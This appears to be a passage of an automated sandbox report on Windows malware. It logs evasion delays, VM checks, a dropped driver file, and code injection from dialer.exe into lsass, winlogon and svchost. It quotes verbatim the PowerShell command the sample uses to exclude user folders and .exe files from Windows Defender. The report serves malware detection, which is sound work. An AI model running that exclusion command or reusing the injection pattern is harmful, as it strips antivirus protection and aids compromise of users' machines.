            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4955Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4898Jump to behavior
            Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 2514Jump to behavior
            Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 7484Jump to behavior
            Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9666Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7433Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2125Jump to behavior
            Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 805
            Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9857
            Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1735
            Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 782
            Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\lwouyklykeoh.sysJump to dropped file
            Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_34-14702
            Source: C:\Windows\System32\dwm.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_41-14842
            Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_40-14770
            Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_31-22068
            Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_25-480
            Source: C:\Windows\System32\lsass.exeAPI coverage: 6.3 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 5.3 %
            Source: C:\Windows\System32\dialer.exeAPI coverage: 0.8 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 5.0 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 5.2 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 7.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 4955 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 4898 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\dialer.exe TID: 7292Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Windows\System32\winlogon.exe TID: 4756Thread sleep count: 2514 > 30Jump to behavior
            Source: C:\Windows\System32\winlogon.exe TID: 4756Thread sleep time: -2514000s >= -30000sJump to behavior
            Source: C:\Windows\System32\winlogon.exe TID: 4756Thread sleep count: 7484 > 30Jump to behavior
            Source: C:\Windows\System32\winlogon.exe TID: 4756Thread sleep time: -7484000s >= -30000sJump to behavior
            Source: C:\Windows\System32\lsass.exe TID: 7716Thread sleep count: 9666 > 30Jump to behavior
            Source: C:\Windows\System32\lsass.exe TID: 7716Thread sleep time: -9666000s >= -30000sJump to behavior
            Source: C:\Windows\System32\lsass.exe TID: 7716Thread sleep count: 270 > 30Jump to behavior
            Source: C:\Windows\System32\lsass.exe TID: 7716Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep count: 7433 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep count: 2125 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep count: 805 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7700Thread sleep time: -805000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 7340Thread sleep count: 9857 > 30
            Source: C:\Windows\System32\dwm.exe TID: 7340Thread sleep time: -9857000s >= -30000s
            Source: C:\Windows\System32\dialer.exe TID: 7200Thread sleep count: 1735 > 30
            Source: C:\Windows\System32\dialer.exe TID: 7200Thread sleep time: -173500s >= -30000s
            Source: C:\Windows\System32\dialer.exe TID: 6516Thread sleep count: 782 > 30
            Source: C:\Windows\System32\dialer.exe TID: 6516Thread sleep time: -78200s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep count: 253 > 30
            Source: C:\Windows\System32\svchost.exe TID: 2520Thread sleep time: -253000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 3096Thread sleep count: 254 > 30
            Source: C:\Windows\System32\svchost.exe TID: 3096Thread sleep time: -254000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7196Thread sleep count: 253 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7196Thread sleep time: -253000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 1796Thread sleep count: 252 > 30
            Source: C:\Windows\System32\svchost.exe TID: 1796Thread sleep time: -252000s >= -30000s
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCDCE0 FindFirstFileExW,31_2_000001F385BCDCE0
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199DCE0 FindFirstFileExW,34_2_000002A29199DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDDCE0 FindFirstFileExW,40_2_0000014E25EDDCE0
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4DCE0 FindFirstFileExW,41_2_00000283E0F4DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CDCE0 FindFirstFileExW,66_2_000001FB539CDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDDCE0 FindFirstFileExW,67_2_000001CBD8BDDCE0
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16DCE0 FindFirstFileExW,68_2_000001F2BD16DCE0
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BADCE0 FindFirstFileExW,69_2_00000229F8BADCE0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
            Source: dwm.exe, 00000029.00000000.1406284421.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
            Source: lsass.exe, 00000022.00000002.2575794630.000002A290A88000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
            Source: svchost.exe, 00000028.00000002.2574027589.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000P
            Source: dwm.exe, 00000029.00000000.1406284421.00000283DDE43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: lsass.exe, 00000022.00000002.2575122927.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388647255.000002A290A13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.1399843989.0000014E25213000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2573834327.0000014E25213000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: svchost.exe, 00000028.00000002.2574027589.0000014E2522A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_25-413
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_63-477
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_65-91
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
            Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,25_2_00000001400017EC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BC7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BC7D90
            Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001F385BCD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000001F385BCD2A4
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A29199D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000002A29199D2A4
            Source: C:\Windows\System32\lsass.exeCode function: 34_2_000002A291997D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_000002A291997D90
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25EDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25EDD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 40_2_0000014E25ED7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_0000014E25ED7D90
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000283E0F4D2A4
            Source: C:\Windows\System32\dwm.exeCode function: 41_2_00000283E0F47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_00000283E0F47D90
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001FB539C7D90
            Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001FB539CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,66_2_000001FB539CD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001CBD8BD7D90
            Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001CBD8BDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_000001CBD8BDD2A4
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD167D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001F2BD167D90
            Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001F2BD16D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_000001F2BD16D2A4
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000229F8BA7D90
            Source: C:\Windows\System32\svchost.exeCode function: 69_2_00000229F8BAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000229F8BAD2A4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Allocates memory in foreign processes
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F385B90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2A2911C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E255D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 283E0EE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 1F385BF0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2A2919C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E25F00000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 283E0F10000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FB53990000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1CBD8BA0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F2BD130000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 229F8B70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2938AFD0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2258F3D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26F54840000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22B76580000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1265E790000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18510D30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200A2B70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F33CBD0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FAB73D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D3E96E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2389D0D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22E66FD0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A4D6530000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20763780000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200FF1A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23CC6130000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 266F1070000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26008BB0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 12E54DA0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2CF20530000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FDE9EA0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19EA6340000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: A50000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ED5C5A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EC464E0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 15B351A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C38C460000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DC09A20000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C73F940000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 22300B00000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1616A5B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181C5E90000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18E3AF30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D70B1D0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26DA05C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C9B0460000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23A7CF40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 184FCB80000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1CF1ED70000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1697C550000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F0FE030000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC093B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C8004A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 118D8250000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 27687590000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28FAA0B0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: B20000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19292570000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 2A31FCE0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 221CFED0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23D73B60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EF6E810000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 15DAA130000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 269FBD60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 14A28E00000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19605730000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D87EE60000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 17D8C030000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 12899B50000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29B94950000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 22978560000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1C3311C0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1BC39FC0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA311A0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ECA6C50000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17847BC0000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 231D5F40000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D49F940000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 24FCA850000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B30000 protect: page execute and read and write
            Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1F180B60000 protect: page execute and read and write
            Contains functionality to inject code into remote processes
            Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 85B9273CJump to behavior
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: 911C273CJump to behavior
            Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 255D273CJump to behavior
            Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 85BF273C
